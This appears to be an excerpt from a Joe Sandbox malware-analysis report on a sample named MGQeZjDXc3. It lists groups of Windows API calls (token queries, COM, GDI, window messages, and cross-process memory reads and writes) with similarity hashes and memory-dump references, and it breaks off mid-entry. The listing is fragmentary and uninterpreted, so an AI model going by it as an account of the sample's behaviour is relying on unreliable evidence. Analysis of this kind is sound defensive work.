                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                • String ID:
                                                • API String ID: 842720411-0
                                                • Opcode ID: 0555af1808774d8aabb21a5e27e8638b1fef33a1f8e8c505c72db049b68346ef
                                                • Instruction ID: 9fd5e03389b40c669ff7a82b83b896546ae087ebd665b638c99fceb1793d011e
                                                • Opcode Fuzzy Hash: 0555af1808774d8aabb21a5e27e8638b1fef33a1f8e8c505c72db049b68346ef
                                                • Instruction Fuzzy Hash: 5B013C71210204BFDB214FA9DC48DAB3BADEF8A765710042AF946D3260DA71DC51CFA1
                                                APIs
                                                • CLSIDFromProgID.OLE32 ref: 00AD9ADC
                                                • ProgIDFromCLSID.OLE32(?,00000000), ref: 00AD9AF7
                                                • lstrcmpiW.KERNEL32(?,00000000), ref: 00AD9B05
                                                • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00AD9B15
                                                • CLSIDFromString.OLE32(?,?), ref: 00AD9B21
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                • String ID:
                                                • API String ID: 3897988419-0
                                                • Opcode ID: 2b03318ddb8f4c448f5ddd469832b4b603b598e74afca426343bf01073b1d40b
                                                • Instruction ID: dabd564de7463906700ba9a100efc7fad214a33a1c30ef239fe72faf5205acf3
                                                • Opcode Fuzzy Hash: 2b03318ddb8f4c448f5ddd469832b4b603b598e74afca426343bf01073b1d40b
                                                • Instruction Fuzzy Hash: 73016276600215BFDB214F58ED44B9A7BFDEF44751F154026F906E7210DB70DD419BA0
                                                APIs
                                                • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AE7A74
                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00AE7A82
                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00AE7A8A
                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00AE7A94
                                                • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AE7AD0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                • String ID:
                                                • API String ID: 2833360925-0
                                                • Opcode ID: 99c57fa2be3523492a386903a4c3b0ca8d65230e76fd79120ee7f7980012ab47
                                                • Instruction ID: f13216b098731ccbdfb93c186419ce00cd5028000c05e37de2274cf9593cfcc3
                                                • Opcode Fuzzy Hash: 99c57fa2be3523492a386903a4c3b0ca8d65230e76fd79120ee7f7980012ab47
                                                • Instruction Fuzzy Hash: 16011731C04619EBDF10EFE6DC48ADDBB78FF08792F1004A5E602B3150DB349A5187A1
                                                APIs
                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00ADAADA
                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00ADAAE4
                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00ADAAF3
                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00ADAAFA
                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00ADAB10
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                • String ID:
                                                • API String ID: 44706859-0
                                                • Opcode ID: 435c6703176a4ec0c7c457c337e2df3c0e46bf154724220e0fc83a6babc5c57c
                                                • Instruction ID: 4a3df57036439455c9112d12869152d841f0fffbfd50a5042ad9e00faead644a
                                                • Opcode Fuzzy Hash: 435c6703176a4ec0c7c457c337e2df3c0e46bf154724220e0fc83a6babc5c57c
                                                • Instruction Fuzzy Hash: 5AF04F712002086FEB210FA4EC88E673B6DFF49755F10042AF942D72A0CA609C138A61
                                                APIs
                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00ADAA79
                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00ADAA83
                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00ADAA92
                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00ADAA99
                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00ADAAAF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                • String ID:
                                                • API String ID: 44706859-0
                                                • Opcode ID: 7a1c141183657ebeaf731d7fbb8f3070ea62f88fa7529eb2565dd9fc1c17365f
                                                • Instruction ID: c4872f87c2af58bf073bc9ff84f51693641eaaee90f54d41771df7148b8b3456
                                                • Opcode Fuzzy Hash: 7a1c141183657ebeaf731d7fbb8f3070ea62f88fa7529eb2565dd9fc1c17365f
                                                • Instruction Fuzzy Hash: B4F04F722002046FEB215FA4EC8DE673BACFF49795F50051AF942D72A0DA60DC42CA61
                                                APIs
                                                • GetDlgItem.USER32(?,000003E9), ref: 00ADEC94
                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00ADECAB
                                                • MessageBeep.USER32(00000000), ref: 00ADECC3
                                                • KillTimer.USER32(?,0000040A), ref: 00ADECDF
                                                • EndDialog.USER32(?,00000001), ref: 00ADECF9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                • String ID:
                                                • API String ID: 3741023627-0
                                                • Opcode ID: e804e92e8ac41d76ade94556f730aa3bea37e65dc285c06c66df166d8f65c87b
                                                • Instruction ID: 6a72488fcd0cb9a47a40018105fa7986926b6f2e92c3a5153fd16f88b7d34b1c
                                                • Opcode Fuzzy Hash: e804e92e8ac41d76ade94556f730aa3bea37e65dc285c06c66df166d8f65c87b
                                                • Instruction Fuzzy Hash: FD01A430510704ABEB35AB10DE4EB9677B8FF10B09F00055AB583A65E0DFF4AA55CB80
                                                APIs
                                                • EndPath.GDI32(?), ref: 00ABB0BA
                                                • StrokeAndFillPath.GDI32(?,?,00B1E680,00000000,?,?,?), ref: 00ABB0D6
                                                • SelectObject.GDI32(?,00000000), ref: 00ABB0E9
                                                • DeleteObject.GDI32 ref: 00ABB0FC
                                                • StrokePath.GDI32(?), ref: 00ABB117
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                • String ID:
                                                • API String ID: 2625713937-0
                                                • Opcode ID: 635ba1778301d84d069b6d3374870ad06d9365f0db669392f6b40557941be370
                                                • Instruction ID: 1a3c94ff97a70e3a9b07e26f3f6f21006b712d011f86fe986af6c08c1e632d03
                                                • Opcode Fuzzy Hash: 635ba1778301d84d069b6d3374870ad06d9365f0db669392f6b40557941be370
                                                • Instruction Fuzzy Hash: 8EF0C938014244EFDB219F6DEC0D7A53F69A710362F088715E825960F1CFB98966DF64
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 00AEF2DA
                                                • CoCreateInstance.OLE32(00B2DA7C,00000000,00000001,00B2D8EC,?), ref: 00AEF2F2
                                                • CoUninitialize.OLE32 ref: 00AEF555
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CreateInitializeInstanceUninitialize
                                                • String ID: .lnk
                                                • API String ID: 948891078-24824748
                                                • Opcode ID: 9aa2b0e5e415472a08d9bbdc72387166cca3d83826dd760a73e0b62685845bd2
                                                • Instruction ID: 59b2740d7fa5afd1799f6d6f832f1fe6d07ece12abacde643fc97d094c4e5cb0
                                                • Opcode Fuzzy Hash: 9aa2b0e5e415472a08d9bbdc72387166cca3d83826dd760a73e0b62685845bd2
                                                • Instruction Fuzzy Hash: C2A12971104201AFD300EF64C981EAFB7ECEF99714F00495DF5559B2A2EB71EA49CBA2
                                                APIs
                                                  • Part of subcall function 00AA660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA53B1,?,?,00AA61FF,?,00000000,00000001,00000000), ref: 00AA662F
                                                • CoInitialize.OLE32(00000000), ref: 00AEE85D
                                                • CoCreateInstance.OLE32(00B2DA7C,00000000,00000001,00B2D8EC,?), ref: 00AEE876
                                                • CoUninitialize.OLE32 ref: 00AEE893
                                                  • Part of subcall function 00AA936C: __swprintf.LIBCMT ref: 00AA93AB
                                                  • Part of subcall function 00AA936C: __itow.LIBCMT ref: 00AA93DF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                • String ID: .lnk
                                                • API String ID: 2126378814-24824748
                                                • Opcode ID: 7c3aac60dd4bea328dc7b8ff9c4ddfe66c3c2814172f8766360f6b18ef0ae716
                                                • Instruction ID: b80d254346ec4a321b6a2710fad34a198b629fef8d28df0ba6baed2ea47b08da
                                                • Opcode Fuzzy Hash: 7c3aac60dd4bea328dc7b8ff9c4ddfe66c3c2814172f8766360f6b18ef0ae716
                                                • Instruction Fuzzy Hash: 2BA154356043419FCB10DF25C98496EBBE5FF89310F048998F99A9B3A2CB31EC45CB91
                                                APIs
                                                • __startOneArgErrorHandling.LIBCMT ref: 00AC32ED
                                                  • Part of subcall function 00ACE0D0: __87except.LIBCMT ref: 00ACE10B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ErrorHandling__87except__start
                                                • String ID: pow
                                                • API String ID: 2905807303-2276729525
                                                • Opcode ID: 2361de3c36825520cda2b3fa45a01b61273e7c135be1dd9c53c2a1a9facbe55c
                                                • Instruction ID: 6224f218e0f2aefdbdb6481c6290b9b61c1280c02a45880a7c8ba04439aef3ca
                                                • Opcode Fuzzy Hash: 2361de3c36825520cda2b3fa45a01b61273e7c135be1dd9c53c2a1a9facbe55c
                                                • Instruction Fuzzy Hash: A4514B32A0920196CF15F714CA41FBE2BA49B50710F36CE6CF4D58A2E9DF358ED4D646
                                                APIs
                                                • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00B3DC50,?,0000000F,0000000C,00000016,00B3DC50,?), ref: 00AE4645
                                                  • Part of subcall function 00AA936C: __swprintf.LIBCMT ref: 00AA93AB
                                                  • Part of subcall function 00AA936C: __itow.LIBCMT ref: 00AA93DF
                                                • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00AE46C5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: BuffCharUpper$__itow__swprintf
                                                • String ID: REMOVE$THIS
                                                • API String ID: 3797816924-776492005
                                                • Opcode ID: 76f18e740d54d354943b6dc10ca0b7101135d321c37f336e942c8dcace2bf87e
                                                • Instruction ID: 80005484f751dc1bef949537356c1fec2217b57780ac2bc9bb8bb1b716001005
                                                • Opcode Fuzzy Hash: 76f18e740d54d354943b6dc10ca0b7101135d321c37f336e942c8dcace2bf87e
                                                • Instruction Fuzzy Hash: B241B334A002599FCF01EF65C981AAEB7F9FF4A304F148059E916AB392DB34DD45CB90
                                                APIs
                                                  • Part of subcall function 00AE430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00ADBC08,?,?,00000034,00000800,?,00000034), ref: 00AE4335
                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00ADC1D3
                                                  • Part of subcall function 00AE42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00ADBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00AE4300
                                                  • Part of subcall function 00AE422F: GetWindowThreadProcessId.USER32(?,?), ref: 00AE425A
                                                  • Part of subcall function 00AE422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00ADBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00AE426A
                                                  • Part of subcall function 00AE422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00ADBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00AE4280
                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00ADC240
                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00ADC28D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                • String ID: @
                                                • API String ID: 4150878124-2766056989
                                                • Opcode ID: 1c0f0a35cce9d1f45611b30813285b79631f118f15dfe1ad0efaa1a87f60c9f0
                                                • Instruction ID: a066d82958de4233416e9835134635fe8f64c4f4b58b6f9ddf0c0c556c13185c
                                                • Opcode Fuzzy Hash: 1c0f0a35cce9d1f45611b30813285b79631f118f15dfe1ad0efaa1a87f60c9f0
                                                • Instruction Fuzzy Hash: 47414A72900219AFDB11EFA4CD81AEEBBB8FF09310F104095FA56B7281DB716E45CB61
                                                APIs
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00B3DC00,00000000,?,?,?,?), ref: 00B0A6D8
                                                • GetWindowLongW.USER32 ref: 00B0A6F5
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B0A705
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Window$Long
                                                • String ID: SysTreeView32
                                                • API String ID: 847901565-1698111956
                                                • Opcode ID: 27cf795a2159b59aab81683ec418dbb3ab666588cc23c52b0bda2dfcf8038f12
                                                • Instruction ID: 4a6554ba9c4448322a55d25e94c603186c01019b03ff98b211033e6093a24dbf
                                                • Opcode Fuzzy Hash: 27cf795a2159b59aab81683ec418dbb3ab666588cc23c52b0bda2dfcf8038f12
                                                • Instruction Fuzzy Hash: 46319C35600206AFDB218E38DC41BEA7BA9FB49324F244B65F875932E1DB71EC519B50
                                                APIs
                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00B0A15E
                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00B0A172
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B0A196
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window
                                                • String ID: SysMonthCal32
                                                • API String ID: 2326795674-1439706946
                                                • Opcode ID: dcbb29a6fc87ff9b3d300cf8e8cbf92d4841bc2100262914efcb9eb0c081d8fa
                                                • Instruction ID: cb8ccf234f9efd0448f870bb13ca2f75d3b96c743ffe841b061ed2604b671288
                                                • Opcode Fuzzy Hash: dcbb29a6fc87ff9b3d300cf8e8cbf92d4841bc2100262914efcb9eb0c081d8fa
                                                • Instruction Fuzzy Hash: D221BF32500218ABEF118FA4CC82FEA3BB9EF49714F100654FA55BB1D0D6B5AC51CB90
                                                APIs
                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00B0A941
                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00B0A94F
                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B0A956
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessageSend$DestroyWindow
                                                • String ID: msctls_updown32
                                                • API String ID: 4014797782-2298589950
                                                • Opcode ID: 91778f0d994a6ecfd6fc8e18f9c3b1e6f473e028b049fc3726d357f489a2e4bd
                                                • Instruction ID: 029ce370307db425e2395222bcc3f2ca93a4da438a153465a6f05f635cabb38d
                                                • Opcode Fuzzy Hash: 91778f0d994a6ecfd6fc8e18f9c3b1e6f473e028b049fc3726d357f489a2e4bd
                                                • Instruction Fuzzy Hash: 7D2192B5600309AFDB11DF28CCC5D673BEDEF5A394B050899FA059B2A1CB70EC118B61
                                                APIs
                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B09A30
                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B09A40
                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B09A65
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessageSend$MoveWindow
                                                • String ID: Listbox
                                                • API String ID: 3315199576-2633736733
                                                • Opcode ID: ff5bcd17e19a48b137b84c26132cc43fc6c608da697f5ac07813e70e9262a9d3
                                                • Instruction ID: ad04ed8037894c4173943f04307527eac6e89b270575666648a6aaa0e383f89c
                                                • Opcode Fuzzy Hash: ff5bcd17e19a48b137b84c26132cc43fc6c608da697f5ac07813e70e9262a9d3
                                                • Instruction Fuzzy Hash: 2B21C232610118BFDB228F54CC85FBB3BAAEF89750F018168F9549B1E1CA719C5287A0
                                                APIs
                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B0A46D
                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B0A482
                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B0A48F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
